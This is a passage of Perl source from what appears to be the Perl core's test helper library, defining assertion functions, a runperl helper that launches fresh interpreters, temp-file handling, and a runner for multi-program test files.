$name =~ s/#/\\#/g;
$out = $pass ? "ok $test - $name" : "not ok $test - $name";
} else {
$out = $pass ? "ok $test" : "not ok $test";
}
if ($TODO) {
$out = $out . " # TODO $TODO";
} else {
$Tests_Are_Passing = 0 unless $pass;
}
_print "$out\n";
if ($pass) {
note @mess; # Ensure that the message is properly escaped.
}
else {
my $msg = "# Failed test $test - ";
$msg.= "$name " if $name;
$msg .= "$where\n";
_diag $msg;
_diag @mess;
}
$test = $test + 1; # don't use ++
return $pass;
}
sub _where {
my @caller = caller($Level);
return "at $caller[1] line $caller[2]";
}
# DON'T use this for matches. Use like() instead.
sub ok ($@) {
my ($pass, $name, @mess) = @_;
_ok($pass, _where(), $name, @mess);
}
sub _q {
my $x = shift;
return 'undef' unless defined $x;
my $q = $x;
$q =~ s/\\/\\\\/g;
$q =~ s/'/\\'/g;
return "'$q'";
}
sub _qq {
my $x = shift;
return defined $x ? '"' . display ($x) . '"' : 'undef';
};
# keys are the codes \n etc map to, values are 2 char strings such as \n
my %backslash_escape;
foreach my $x (split //, 'nrtfa\\\'"') {
$backslash_escape{ord eval "\"\\$x\""} = "\\$x";
}
# A way to display scalars containing control characters and Unicode.
# Trying to avoid setting $_, or relying on local $_ to work.
sub display {
my @result;
foreach my $x (@_) {
if (defined $x and not ref $x) {
my $y = '';
foreach my $c (unpack("W*", $x)) {
if ($c > 255) {
$y = $y . sprintf "\\x{%x}", $c;
} elsif ($backslash_escape{$c}) {
$y = $y . $backslash_escape{$c};
} else {
my $z = chr $c; # Maybe we can get away with a literal...
if ($z !~ /[^[:^print:][:^ascii:]]/) {
# The pattern above is equivalent (by de Morgan's
# laws) to:
# $z !~ /(?[ [:print:] & [:ascii:] ])/
# or, $z is not an ascii printable character
# Use octal for characters with small ordinals that
# are traditionally expressed as octal: the controls
# below space, which on EBCDIC are almost all the
# controls, but on ASCII don't include DEL nor the C1
# controls.
if ($c < ord " ") {
$z = sprintf "\\%03o", $c;
} else {
$z = sprintf "\\x{%x}", $c;
}
}
$y = $y . $z;
}
}
$x = $y;
}
return $x unless wantarray;
push @result, $x;
}
return @result;
}
sub is ($$@) {
my ($got, $expected, $name, @mess) = @_;
my $pass;
if( !defined $got || !defined $expected ) {
# undef only matches undef
$pass = !defined $got && !defined $expected;
}
else {
$pass = $got eq $expected;
}
unless ($pass) {
unshift(@mess, "# got "._qq($got)."\n",
"# expected "._qq($expected)."\n");
}
_ok($pass, _where(), $name, @mess);
}
sub isnt ($$@) {
my ($got, $isnt, $name, @mess) = @_;
my $pass;
if( !defined $got || !defined $isnt ) {
# undef only matches undef
$pass = defined $got || defined $isnt;
}
else {
$pass = $got ne $isnt;
}
unless( $pass ) {
unshift(@mess, "# it should not be "._qq($got)."\n",
"# but it is.\n");
}
_ok($pass, _where(), $name, @mess);
}
sub cmp_ok ($$$@) {
my($got, $type, $expected, $name, @mess) = @_;
my $pass;
{
local $^W = 0;
local($@,$!); # don't interfere with $@
# eval() sometimes resets $!
$pass = eval "\$got $type \$expected";
}
unless ($pass) {
# It seems Irix long doubles can have 2147483648 and 2147483648
# that stringify to the same thing but are actually numerically
# different. Display the numbers if $type isn't a string operator,
# and the numbers are stringwise the same.
# (all string operators have alphabetic names, so tr/a-z// is true)
# This will also show numbers for some unneeded cases, but will
# definitely be helpful for things such as == and <= that fail
if ($got eq $expected and $type !~ tr/a-z//) {
unshift @mess, "# $got - $expected = " . ($got - $expected) . "\n";
}
unshift(@mess, "# got "._qq($got)."\n",
"# expected $type "._qq($expected)."\n");
}
_ok($pass, _where(), $name, @mess);
}
# Check that $got is within $range of $expected
# if $range is 0, then check it's exact
# else if $expected is 0, then $range is an absolute value
# otherwise $range is a fractional error.
# Here $range must be numeric, >= 0
# Non numeric ranges might be a useful future extension. (eg %)
sub within ($$$@) {
my ($got, $expected, $range, $name, @mess) = @_;
my $pass;
if (!defined $got or !defined $expected or !defined $range) {
# This is a fail, but doesn't need extra diagnostics
} elsif ($got !~ tr/0-9// or $expected !~ tr/0-9// or $range !~ tr/0-9//) {
# This is a fail
unshift @mess, "# got, expected and range must be numeric\n";
} elsif ($range < 0) {
# This is also a fail
unshift @mess, "# range must not be negative\n";
} elsif ($range == 0) {
# Within 0 is ==
$pass = $got == $expected;
} elsif ($expected == 0) {
# If expected is 0, treat range as absolute
$pass = ($got <= $range) && ($got >= - $range);
} else {
my $diff = $got - $expected;
$pass = abs ($diff / $expected) < $range;
}
unless ($pass) {
if ($got eq $expected) {
unshift @mess, "# $got - $expected = " . ($got - $expected) . "\n";
}
unshift@mess, "# got "._qq($got)."\n",
"# expected "._qq($expected)." (within "._qq($range).")\n";
}
_ok($pass, _where(), $name, @mess);
}
# Note: this isn't quite as fancy as Test::More::like().
sub like ($$@) { like_yn (0,@_) }; # 0 for -
sub unlike ($$@) { like_yn (1,@_) }; # 1 for un-
sub like_yn ($$$@) {
my ($flip, undef, $expected, $name, @mess) = @_;
# We just accept like(..., qr/.../), not like(..., '...'), and
# definitely not like(..., '/.../') like
# Test::Builder::maybe_regex() does.
unless (re::is_regexp($expected)) {
die "PANIC: The value '$expected' isn't a regexp. The like() function needs a qr// pattern, not a string";
}
my $pass;
$pass = $_[1] =~ /$expected/ if !$flip;
$pass = $_[1] !~ /$expected/ if $flip;
my $display_got = $_[1];
$display_got = display($display_got);
my $display_expected = $expected;
$display_expected = display($display_expected);
unless ($pass) {
unshift(@mess, "# got '$display_got'\n",
$flip
? "# expected !~ /$display_expected/\n"
: "# expected /$display_expected/\n");
}
local $Level = $Level + 1;
_ok($pass, _where(), $name, @mess);
}
sub pass {
_ok(1, '', @_);
}
sub fail {
_ok(0, _where(), @_);
}
sub curr_test {
$test = shift if @_;
return $test;
}
sub next_test {
my $retval = $test;
$test = $test + 1; # don't use ++
$retval;
}
# Note: can't pass multipart messages since we try to
# be compatible with Test::More::skip().
sub skip {
my $why = shift;
my $n = @_ ? shift : 1;
my $bad_swap;
my $both_zero;
{
local $^W = 0;
$bad_swap = $why > 0 && $n == 0;
$both_zero = $why == 0 && $n == 0;
}
if ($bad_swap || $both_zero || @_) {
my $arg = "'$why', '$n'";
if (@_) {
$arg .= join(", ", '', map { qq['$_'] } @_);
}
die qq[$0: expected skip(why, count), got skip($arg)\n];
}
for (1..$n) {
_print "ok $test # skip $why\n";
$test = $test + 1;
}
local $^W = 0;
last SKIP;
}
sub skip_if_miniperl {
skip(@_) if is_miniperl();
}
sub skip_without_dynamic_extension {
my $extension = shift;
skip("no dynamic loading on miniperl, no extension $extension", @_)
if is_miniperl();
return if &_have_dynamic_extension($extension);
skip("extension $extension was not built", @_);
}
sub todo_skip {
my $why = shift;
my $n = @_ ? shift : 1;
for (1..$n) {
_print "not ok $test # TODO & SKIP $why\n";
$test = $test + 1;
}
local $^W = 0;
last TODO;
}
sub eq_array {
my ($ra, $rb) = @_;
return 0 unless $#$ra == $#$rb;
for my $i (0..$#$ra) {
next if !defined $ra->[$i] && !defined $rb->[$i];
return 0 if !defined $ra->[$i];
return 0 if !defined $rb->[$i];
return 0 unless $ra->[$i] eq $rb->[$i];
}
return 1;
}
sub eq_hash {
my ($orig, $suspect) = @_;
my $fail;
while (my ($key, $value) = each %$suspect) {
# Force a hash recompute if this perl's internals can cache the hash key.
$key = "" . $key;
if (exists $orig->{$key}) {
if (
defined $orig->{$key} != defined $value
|| (defined $value && $orig->{$key} ne $value)
) {
_print "# key ", _qq($key), " was ", _qq($orig->{$key}),
" now ", _qq($value), "\n";
$fail = 1;
}
} else {
_print "# key ", _qq($key), " is ", _qq($value),
", not in original.\n";
$fail = 1;
}
}
foreach (keys %$orig) {
# Force a hash recompute if this perl's internals can cache the hash key.
$_ = "" . $_;
next if (exists $suspect->{$_});
_print "# key ", _qq($_), " was ", _qq($orig->{$_}), " now missing.\n";
$fail = 1;
}
!$fail;
}
# We only provide a subset of the Test::More functionality.
sub require_ok ($) {
my ($require) = @_;
if ($require =~ tr/[A-Za-z0-9:.]//c) {
fail("Invalid character in \"$require\", passed to require_ok");
} else {
eval <<REQUIRE_OK;
require $require;
REQUIRE_OK
is($@, '', _where(), "require $require");
}
}
sub use_ok ($) {
my ($use) = @_;
if ($use =~ tr/[A-Za-z0-9:.]//c) {
fail("Invalid character in \"$use\", passed to use");
} else {
eval <<USE_OK;
use $use;
USE_OK
is($@, '', _where(), "use $use");
}
}
# runperl - Runs a separate perl interpreter and returns its output.
# Arguments :
# switches => [ command-line switches ]
# nolib => 1 # don't use -I../lib (included by default)
# non_portable => Don't warn if a one liner contains quotes
# prog => one-liner (avoid quotes)
# progs => [ multi-liner (avoid quotes) ]
# progfile => perl script
# stdin => string to feed the stdin (or undef to redirect from /dev/null)
# stderr => If 'devnull' suppresses stderr, if other TRUE value redirect
# stderr to stdout
# args => [ command-line arguments to the perl program ]
# verbose => print the command line
my $is_mswin = $^O eq 'MSWin32';
my $is_netware = $^O eq 'NetWare';
my $is_vms = $^O eq 'VMS';
my $is_cygwin = $^O eq 'cygwin';
sub _quote_args {
my ($runperl, $args) = @_;
foreach (@$args) {
# In VMS protect with doublequotes because otherwise
# DCL will lowercase -- unless already doublequoted.
$_ = q(").$_.q(") if $is_vms && !/^\"/ && length($_) > 0;
$runperl = $runperl . ' ' . $_;
}
return $runperl;
}
sub _create_runperl { # Create the string to qx in runperl().
my %args = @_;
my $runperl = which_perl();
if ($runperl =~ m/\s/) {
$runperl = qq{"$runperl"};
}
#- this allows, for example, to set PERL_RUNPERL_DEBUG=/usr/bin/valgrind
if ($ENV{PERL_RUNPERL_DEBUG}) {
$runperl = "$ENV{PERL_RUNPERL_DEBUG} $runperl";
}
unless ($args{nolib}) {
$runperl = $runperl . ' "-I../lib"'; # doublequotes because of VMS
}
if ($args{switches}) {
local $Level = 2;
die "test.pl:runperl(): 'switches' must be an ARRAYREF " . _where()
unless ref $args{switches} eq "ARRAY";
$runperl = _quote_args($runperl, $args{switches});
}
if (defined $args{prog}) {
die "test.pl:runperl(): both 'prog' and 'progs' cannot be used " . _where()
if defined $args{progs};
$args{progs} = [split /\n/, $args{prog}, -1]
}
if (defined $args{progs}) {
die "test.pl:runperl(): 'progs' must be an ARRAYREF " . _where()
unless ref $args{progs} eq "ARRAY";
foreach my $prog (@{$args{progs}}) {
if (!$args{non_portable}) {
if ($prog =~ tr/'"//) {
warn "quotes in prog >>$prog<< are not portable";
}
if ($prog =~ /^([<>|]|2>)/) {
warn "Initial $1 in prog >>$prog<< is not portable";
}
if ($prog =~ /&\z/) {
warn "Trailing & in prog >>$prog<< is not portable";
}
}
if ($is_mswin || $is_netware || $is_vms) {
$runperl = $runperl . qq ( -e "$prog" );
}
else {
$runperl = $runperl . qq ( -e '$prog' );
}
}
} elsif (defined $args{progfile}) {
$runperl = $runperl . qq( "$args{progfile}");
} else {
# You probably didn't want to be sucking in from the upstream stdin
die "test.pl:runperl(): none of prog, progs, progfile, args, "
. " switches or stdin specified"
unless defined $args{args} or defined $args{switches}
or defined $args{stdin};
}
if (defined $args{stdin}) {
# so we don't try to put literal newlines and crs onto the
# command line.
$args{stdin} =~ s/\n/\\n/g;
$args{stdin} =~ s/\r/\\r/g;
if ($is_mswin || $is_netware || $is_vms) {
$runperl = qq{$Perl -e "print qq(} .
$args{stdin} . q{)" | } . $runperl;
}
else {
$runperl = qq{$Perl -e 'print qq(} .
$args{stdin} . q{)' | } . $runperl;
}
} elsif (exists $args{stdin}) {
# Using the pipe construction above can cause fun on systems which use
# ksh as /bin/sh, as ksh does pipes differently (with one less process)
# With sh, for the command line 'perl -e 'print qq()' | perl -e ...'
# the sh process forks two children, which use exec to start the two
# perl processes. The parent shell process persists for the duration of
# the pipeline, and the second perl process starts with no children.
# With ksh (and zsh), the shell saves a process by forking a child for
# just the first perl process, and execing itself to start the second.
# This means that the second perl process starts with one child which
# it didn't create. This causes "fun" when if the tests assume that
# wait (or waitpid) will only return information about processes
# started within the test.
# They also cause fun on VMS, where the pipe implementation returns
# the exit code of the process at the front of the pipeline, not the
# end. This messes up any test using OPTION FATAL.
# Hence it's useful to have a way to make STDIN be at eof without
# needing a pipeline, so that the fork tests have a sane environment
# without these surprises.
# /dev/null appears to be surprisingly portable.
$runperl = $runperl . ($is_mswin ? ' <nul' : ' </dev/null');
}
if (defined $args{args}) {
$runperl = _quote_args($runperl, $args{args});
}
if (exists $args{stderr} && $args{stderr} eq 'devnull') {
$runperl = $runperl . ($is_mswin ? ' 2>nul' : ' 2>/dev/null');
}
elsif ($args{stderr}) {
$runperl = $runperl . ' 2>&1';
}
if ($args{verbose}) {
my $runperldisplay = $runperl;
$runperldisplay =~ s/\n/\n\#/g;
_print_stderr "# $runperldisplay\n";
}
return $runperl;
}
# sub run_perl {} is alias to below
sub runperl {
die "test.pl:runperl() does not take a hashref"
if ref $_[0] and ref $_[0] eq 'HASH';
my $runperl = &_create_runperl;
my $result;
my $tainted = ${^TAINT};
my %args = @_;
exists $args{switches} && grep m/^-T$/, @{$args{switches}} and $tainted = $tainted + 1;
if ($tainted) {
# We will assume that if you're running under -T, you really mean to
# run a fresh perl, so we'll brute force launder everything for you
my $sep;
if (! eval {require Config; 1}) {
warn "test.pl had problems loading Config: $@";
$sep = ':';
} else {
$sep = $Config::Config{path_sep};
}
my @keys = grep {exists $ENV{$_}} qw(CDPATH IFS ENV BASH_ENV);
local @ENV{@keys} = ();
# Untaint, plus take out . and empty string:
local $ENV{'DCL$PATH'} = $1 if $is_vms && exists($ENV{'DCL$PATH'}) && ($ENV{'DCL$PATH'} =~ /(.*)/s);
$ENV{PATH} =~ /(.*)/s;
local $ENV{PATH} =
join $sep, grep { $_ ne "" and $_ ne "." and -d $_ and
($is_mswin or $is_vms or !(stat && (stat _)[2]&0022)) }
split quotemeta ($sep), $1;
if ($is_cygwin) { # Must have /bin under Cygwin
if (length $ENV{PATH}) {
$ENV{PATH} = $ENV{PATH} . $sep;
}
$ENV{PATH} = $ENV{PATH} . '/bin';
}
$runperl =~ /(.*)/s;
$runperl = $1;
$result = `$runperl`;
} else {
$result = `$runperl`;
}
$result =~ s/\n\n/\n/g if $is_vms; # XXX pipes sometimes double these
return $result;
}
# Nice alias
*run_perl = *run_perl = \&runperl; # shut up "used only once" warning
sub DIE {
_print_stderr "# @_\n";
exit 1;
}
# A somewhat safer version of the sometimes wrong $^X.
sub which_perl {
unless (defined $Perl) {
$Perl = $^X;
# VMS should have 'perl' aliased properly
return $Perl if $is_vms;
my $exe;
if (! eval {require Config; 1}) {
warn "test.pl had problems loading Config: $@";
$exe = '';
} else {
$exe = $Config::Config{_exe};
}
$exe = '' unless defined $exe;
# This doesn't absolutize the path: beware of future chdirs().
# We could do File::Spec->abs2rel() but that does getcwd()s,
# which is a bit heavyweight to do here.
if ($Perl =~ /^perl\Q$exe\E$/i) {
my $perl = "perl$exe";
if (! eval {require File::Spec; 1}) {
warn "test.pl had problems loading File::Spec: $@";
$Perl = "./$perl";
} else {
$Perl = File::Spec->catfile(File::Spec->curdir(), $perl);
}
}
# Build up the name of the executable file from the name of
# the command.
if ($Perl !~ /\Q$exe\E$/i) {
$Perl = $Perl . $exe;
}
warn "which_perl: cannot find $Perl from $^X" unless -f $Perl;
# For subcommands to use.
$ENV{PERLEXE} = $Perl;
}
return $Perl;
}
sub unlink_all {
my $count = 0;
foreach my $file (@_) {
1 while unlink $file;
if( -f $file ){
_print_stderr "# Couldn't unlink '$file': $!\n";
}else{
++$count;
}
}
$count;
}
# _num_to_alpha - Returns a string of letters representing a positive integer.
# Arguments :
# number to convert
# maximum number of letters
# returns undef if the number is negative
# returns undef if the number of letters is greater than the maximum wanted
# _num_to_alpha( 0) eq 'A';
# _num_to_alpha( 1) eq 'B';
# _num_to_alpha(25) eq 'Z';
# _num_to_alpha(26) eq 'AA';
# _num_to_alpha(27) eq 'AB';
my @letters = qw(A B C D E F G H I J K L M N O P Q R S T U V W X Y Z);
# Avoid ++ -- ranges split negative numbers
sub _num_to_alpha{
my($num,$max_char) = @_;
return unless $num >= 0;
my $alpha = '';
my $char_count = 0;
$max_char = 0 if $max_char < 0;
while( 1 ){
$alpha = $letters[ $num % 26 ] . $alpha;
$num = int( $num / 26 );
last if $num == 0;
$num = $num - 1;
# char limit
next unless $max_char;
$char_count = $char_count + 1;
return if $char_count == $max_char;
}
return $alpha;
}
my %tmpfiles;
END { unlink_all keys %tmpfiles }
# A regexp that matches the tempfile names
$::tempfile_regexp = 'tmp\d+[A-Z][A-Z]?';
# Avoid ++, avoid ranges, avoid split //
my $tempfile_count = 0;
sub tempfile {
while(1){
my $try = "tmp$$";
my $alpha = _num_to_alpha($tempfile_count,2);
last unless defined $alpha;
$try = $try . $alpha;
$tempfile_count = $tempfile_count + 1;
# Need to note all the file names we allocated, as a second request may
# come before the first is created.
if (!$tmpfiles{$try} && !-e $try) {
# We have a winner
$tmpfiles{$try} = 1;
return $try;
}
}
die "Can't find temporary file name starting \"tmp$$\"";
}
# register_tempfile - Adds a list of files to be removed at the end of the current test file
# Arguments :
# a list of files to be removed later
# returns a count of how many file names were actually added
# Reuses %tmpfiles so that tempfile() will also skip any files added here
# even if the file doesn't exist yet.
sub register_tempfile {
my $count = 0;
for( @_ ){
if( $tmpfiles{$_} ){
_print_stderr "# Temporary file '$_' already added\n";
}else{
$tmpfiles{$_} = 1;
$count = $count + 1;
}
}
return $count;
}
# This is the temporary file for _fresh_perl
my $tmpfile = tempfile();
sub _fresh_perl {
my($prog, $action, $expect, $runperl_args, $name) = @_;
# Given the choice of the mis-parsable {}
# (we want an anon hash, but a borked lexer might think that it's a block)
# or relying on taking a reference to a lexical
# (\ might be mis-parsed, and the reference counting on the pad may go
# awry)
# it feels like the least-worse thing is to assume that auto-vivification
# works. At least, this is only going to be a run-time failure, so won't
# affect tests using this file but not this function.
$runperl_args->{progfile} ||= $tmpfile;
$runperl_args->{stderr} = 1 unless exists $runperl_args->{stderr};
open TEST, ">$tmpfile" or die "Cannot open $tmpfile: $!";
print TEST $prog;
close TEST or die "Cannot close $tmpfile: $!";
my $results = runperl(%$runperl_args);
my $status = $?;
# Clean up the results into something a bit more predictable.
$results =~ s/\n+$//;
$results =~ s/at\s+$::tempfile_regexp\s+line/at - line/g;
$results =~ s/of\s+$::tempfile_regexp\s+aborted/of - aborted/g;
# bison says 'parse error' instead of 'syntax error',
# various yaccs may or may not capitalize 'syntax'.
$results =~ s/^(syntax|parse) error/syntax error/mig;
if ($is_vms) {
# some tests will trigger VMS messages that won't be expected
$results =~ s/\n?%[A-Z]+-[SIWEF]-[A-Z]+,.*//;
# pipes double these sometimes
$results =~ s/\n\n/\n/g;
}
# Use the first line of the program as a name if none was given
unless( $name ) {
($first_line, $name) = $prog =~ /^((.{1,50}).*)/;
$name = $name . '...' if length $first_line > length $name;
}
# Historically this was implemented using a closure, but then that means
# that the tests for closures avoid using this code. Given that there
# are exactly two callers, doing exactly two things, the simpler approach
# feels like a better trade off.
my $pass;
if ($action eq 'eq') {
$pass = is($results, $expect, $name);
} elsif ($action eq '=~') {
$pass = like($results, $expect, $name);
} else {
die "_fresh_perl can't process action '$action'";
}
unless ($pass) {
_diag "# PROG: \n$prog\n";
_diag "# STATUS: $status\n";
}
return $pass;
}
#
# fresh_perl_is
#
# Combination of run_perl() and is().
#
sub fresh_perl_is {
my($prog, $expected, $runperl_args, $name) = @_;
# _fresh_perl() is going to clip the trailing newlines off the result.
# This will make it so the test author doesn't have to know that.
$expected =~ s/\n+$//;
local $Level = 2;
_fresh_perl($prog, 'eq', $expected, $runperl_args, $name);
}
#
# fresh_perl_like
#
# Combination of run_perl() and like().
#
sub fresh_perl_like {
my($prog, $expected, $runperl_args, $name) = @_;
local $Level = 2;
_fresh_perl($prog, '=~', $expected, $runperl_args, $name);
}
# Many tests use the same format in __DATA__ or external files to specify a
# sequence of (fresh) tests to run, extra files they may temporarily need, and
# what the expected output is. Putting it here allows common code to serve
# these multiple tests.
#
# Each program is source code to run followed by an "EXPECT" line, followed
# by the expected output.
#
# The code to run may begin with a command line switch such as -w or -0777
# (alphanumerics only), and may contain (note the '# ' on each):
# # TODO reason for todo
# # SKIP reason for skip
# # SKIP ?code to test if this should be skipped
# # NAME name of the test (as with ok($ok, $name))
#
# The expected output may contain:
# OPTION list of options
# OPTIONS list of options
#
# The possible options for OPTION may be:
# regex - the expected output is a regular expression
# random - all lines match but in any order
# fatal - the code will fail fatally (croak, die)
#
# If the actual output contains a line "SKIPPED" the test will be
# skipped.
#
# If the actual output contains a line "PREFIX", any output starting with that
# line will be ignored when comparing with the expected output
#
# If the global variable $FATAL is true then OPTION fatal is the
# default.
sub _setup_one_file {
my $fh = shift;
# Store the filename as a program that started at line 0.
# Real files count lines starting at line 1.
my @these = (0, shift);
my ($lineno, $current);
while (<$fh>) {
if ($_ eq "########\n") {
if (defined $current) {
push @these, $lineno, $current;
}
undef $current;
} else {
if (!defined $current) {
$lineno = $.;
}
$current .= $_;
}
}
if (defined $current) {
push @these, $lineno, $current;
}
((scalar @these) / 2 - 1, @these);
}
sub setup_multiple_progs {
my ($tests, @prgs);
foreach my $file (@_) {
next if $file =~ /(?:~|\.orig|,v)$/;
next if $file =~ /perlio$/ && !PerlIO::Layer->find('perlio');
next if -d $file;
open my $fh, '<', $file or die "Cannot open $file: $!\n" ;
my $found;
while (<$fh>) {
if (/^__END__/) {
++$found;
last;
}
}
# This is an internal error, and should never happen. All bar one of
# the files had an __END__ marker to signal the end of their preamble,
# although for some it wasn't technically necessary as they have no
# tests. It might be possible to process files without an __END__ by
# seeking back to the start and treating the whole file as tests, but
# it's simpler and more reliable just to make the rule that all files
# must have __END__ in. This should never fail - a file without an
# __END__ should not have been checked in, because the regression tests
# would not have passed.
die "Could not find '__END__' in $file"
unless $found;
my ($t, @p) = _setup_one_file($fh, $file);
$tests += $t;
push @prgs, @p;
close $fh
or die "Cannot close $file: $!\n";
}
return ($tests, @prgs);
}
sub run_multiple_progs {
my $up = shift;
my @prgs;
if ($up) {
# The tests in lib run in a temporary subdirectory of t, and always
# pass in a list of "programs" to run
@prgs = @_;
} else {
# The tests below t run in t and pass in a file handle. In theory we
# can pass (caller)[1] as the second argument to report errors with
# the filename of our caller, as the handle is always DATA. However,
# line numbers in DATA count from the __END__ token, so will be wrong.
# Which is more confusing than not providing line numbers. So, for now,
# don't provide line numbers. No obvious clean solution - one hack
# would be to seek DATA back to the start and read to the __END__ token,
# but that feels almost like we should just open $0 instead.
# Not going to rely on undef in list assignment.
my $dummy;
($dummy, @prgs) = _setup_one_file(shift);
}
my $tmpfile = tempfile();
my ($file, $line);
PROGRAM:
while (defined ($line = shift @prgs)) {
$_ = shift @prgs;
unless ($line) {
$file = $_;
if (defined $file) {
print "# From $file\n";
}
next;
}
my $switch = "";
my @temps ;
my @temp_path;
if (s/^(\s*-\w+)//) {
$switch = $1;
}
my ($prog, $expected) = split(/\nEXPECT(?:\n|$)/, $_, 2);
my %reason;
foreach my $what (qw(skip todo)) {
$prog =~ s/^#\s*\U$what\E\s*(.*)\n//m and $reason{$what} = $1;
# If the SKIP reason starts ? then it's taken as a code snippet to
# evaluate. This provides the flexibility to have conditional SKIPs
if ($reason{$what} && $reason{$what} =~ s/^\?//) {
my $temp = eval $reason{$what};
if ($@) {
die "# In \U$what\E code reason:\n# $reason{$what}\n$@";
}
$reason{$what} = $temp;
}
}
my $name = '';
if ($prog =~ s/^#\s*NAME\s+(.+)\n//m) {
$name = $1;
}
if ($reason{skip}) {
SKIP:
{
skip($name ? "$name - $reason{skip}" : $reason{skip}, 1);
}
next PROGRAM;
}
if ($prog =~ /--FILE--/) {
my @files = split(/\n?--FILE--\s*([^\s\n]*)\s*\n/, $prog) ;
shift @files ;
die "Internal error: test $_ didn't split into pairs, got " .
scalar(@files) . "[" . join("%%%%", @files) ."]\n"
if @files % 2;
while (@files > 2) {
my $filename = shift @files;
my $code = shift @files;
push @temps, $filename;
if ($filename =~ m#(.*)/# && $filename !~ m#^\.\./#) {
require File::Path;
File::Path::mkpath($1);
push(@temp_path, $1);
}
open my $fh, '>', $filename or die "Cannot open $filename: $!\n";
print $fh $code;
close $fh or die "Cannot close $filename: $!\n";
}
shift @files;
$prog = shift @files;
}
open my $fh, '>', $tmpfile or die "Cannot open >$tmpfile: $!";
print $fh q{
BEGIN {
open STDERR, '>&', STDOUT
or die "Can't dup STDOUT->STDERR: $!;";
}
};
print $fh "\n#line 1\n"; # So the line numbers don't get messed up.
print $fh $prog,"\n";
close $fh or die "Cannot close $tmpfile: $!";
my $results = runperl( stderr => 1, progfile => $tmpfile,
stdin => undef, $up
? (switches => [ "-I.", "-I$up/lib", $switch], nolib => 1)
: (switches => [ "-I.", $switch])
);
my $status = $?;
$results =~ s/\n+$//;
# allow expected output to be written as if $prog is on STDIN
$results =~ s/$::tempfile_regexp/-/g;
if ($^O eq 'VMS') {
# some tests will trigger VMS messages that won't be expected
$results =~ s/\n?%[A-Z]+-[SIWEF]-[A-Z]+,.*//;
# pipes double these sometimes
$results =~ s/\n\n/\n/g;
}
# bison says 'parse error' instead of 'syntax error',
# various yaccs may or may not capitalize 'syntax'.
$results =~ s/^(syntax|parse) error/syntax error/mig;
# allow all tests to run when there are leaks
$results =~ s/Scalars leaked: \d+\n//g;
$expected =~ s/\n+$//;
my $prefix = ($results =~ s#^PREFIX(\n|$)##) ;
# any special options? (OPTIONS foo bar zap)
my $option_regex = 0;
my $option_random = 0;
my $fatal = $FATAL;
if ($expected =~ s/^OPTIONS? (.+)\n//) {
foreach my $option (split(' ', $1)) {
if ($option eq 'regex') { # allow regular expressions
$option_regex = 1;
}
elsif ($option eq 'random') { # all lines match, but in any order
$option_random = 1;
}
elsif ($option eq 'fatal') { # perl should fail
$fatal = 1;
}
else {
die "$0: Unknown OPTION '$option'\n";
}
}
}
die "$0: can't have OPTION regex and random\n"
if $option_regex + $option_random > 1;
my $ok = 0;
if ($results =~ s/^SKIPPED\n//) {
print "$results\n" ;
$ok = 1;
}
else {
if ($option_random) {
my @got = sort split "\n", $results;
my @expected = sort split "\n", $expected;
$ok = "@got" eq "@expected";
}
elsif ($option_regex) {
$ok = $results =~ /^$expected/;
}
elsif ($prefix) {
$ok = $results =~ /^\Q$expected/;
}
else {
$ok = $results eq $expected;
}
if ($ok && $fatal && !($status >> 8)) {
$ok = 0;
}
}
local $::TODO = $reason{todo};
unless ($ok) {
my $err_line = "PROG: $switch\n$prog\n" .
"EXPECTED:\n$expected\n";
$err_line .= "EXIT STATUS: != 0\n" if $fatal;
$err_line .= "GOT:\n$results\n";
$err_line .= "EXIT STATUS: " . ($status >> 8) . "\n" if $fatal;
if ($::TODO) {
$err_line =~ s/^/# /mg;
print $err_line; # Harness can't filter it out from STDERR.
}
else {
print STDERR $err_line;
}
}
if (defined $file) {
_ok($ok, "at $file line $line", $name);
} else {
# We don't have file and line number data for the test, so report
# errors as coming from our caller.
local $Level = $Level + 1;
ok($ok, $name);
}
foreach (@temps) {
unlink $_ if $_;
}
foreach (@temp_path) {
File::Path::rmtree $_ if -d $_;
}
}
}
sub can_ok ($@) {
my($proto, @methods) = @_;
my $class = ref $proto || $proto;
unless( @methods ) {
return _ok( 0, _where(), "$class->can(...)" );
}
my @nok = ();
foreach my $method (@methods) {
local($!, $@); # don't interfere with caller's $@
# eval sometimes resets $!
eval { $proto->can($method) } || push @nok, $method;
}
my $name;
$name = @methods == 1 ? "$class->can('$methods[0]')"
: "$class->can(...)";
_ok( !@nok, _where(), $name );
}
# Call $class->new( @$args ); and run the result through object_ok.
# See Test::More::new_ok
sub new_ok {
my($class, $args, $obj_name) = @_;
$args ||= [];
$object_name = "The object" unless defined $obj_name;
local $Level = $Level + 1;
my $obj;
my $ok = eval { $obj = $class->new(@$args); 1 };
my $error = $@;
if($ok) {
object_ok($obj, $class, $object_name);
}
else {
ok( 0, "new() died" );
diag("Error was: $@");
}
return $obj;
}
sub isa_ok ($$;$) {
my($object, $class, $obj_name) = @_;
my $diag;
$obj_name = 'The object' unless defined $obj_name;
my $name = "$obj_name isa $class";
if( !defined $object ) {
$diag = "$obj_name isn't defined";
}
else {
my $whatami = ref $object ? 'object' : 'class';
# We can't use UNIVERSAL::isa because we want to honor isa() overrides
local($@, $!); # eval sometimes resets $!
my $rslt = eval { $object->isa($class) };
my $error = $@; # in case something else blows away $@
if( $error ) {
if( $error =~ /^Can't call method "isa" on unblessed reference/ ) {
# It's an unblessed reference
$obj_name = 'The reference' unless defined $obj_name;
if( !UNIVERSAL::isa($object, $class) ) {
my $ref = ref $object;
$diag = "$obj_name isn't a '$class' it's a '$ref'";
}
}
elsif( $error =~ /Can't call method "isa" without a package/ ) {
# It's something that can't even be a class
$obj_name = 'The thing' unless defined $obj_name;
$diag = "$obj_name isn't a class or reference";
}
else {
die <<WHOA;
WHOA! I tried to call ->isa on your object and got some weird error.
This should never happen. Please contact the author immediately.
Here's the error.
$@
WHOA
}
}
elsif( !$rslt ) {
$obj_name = "The $whatami" unless defined $obj_name;
my $ref = ref $object;
$diag = "$obj_name isn't a '$class' it's a '$ref'";
}
}
_ok( !$diag, _where(), $name );
}
sub class_ok {
my($class, $isa, $class_name) = @_;
# Written so as to count as one test
local $Level = $Level + 1;
if( ref $class ) {
ok( 0, "$class is a reference, not a class name" );
}
else {
isa_ok($class, $isa, $class_name);
}
}
sub object_ok {
my($obj, $isa, $obj_name) = @_;
local $Level = $Level + 1;
if( !ref $obj ) {
ok( 0, "$obj is not a reference" );
}
else {
isa_ok($obj, $isa, $obj_name);
}
}
# Purposefully avoiding a closure.
sub __capture {
push @::__capture, join "", @_;
}
sub capture_warnings {
my $code = shift;
local @::__capture;
local $SIG {__WARN__} = \&__capture;
&$code;
return @::__capture;
}
# This will generate a variable number of tests.
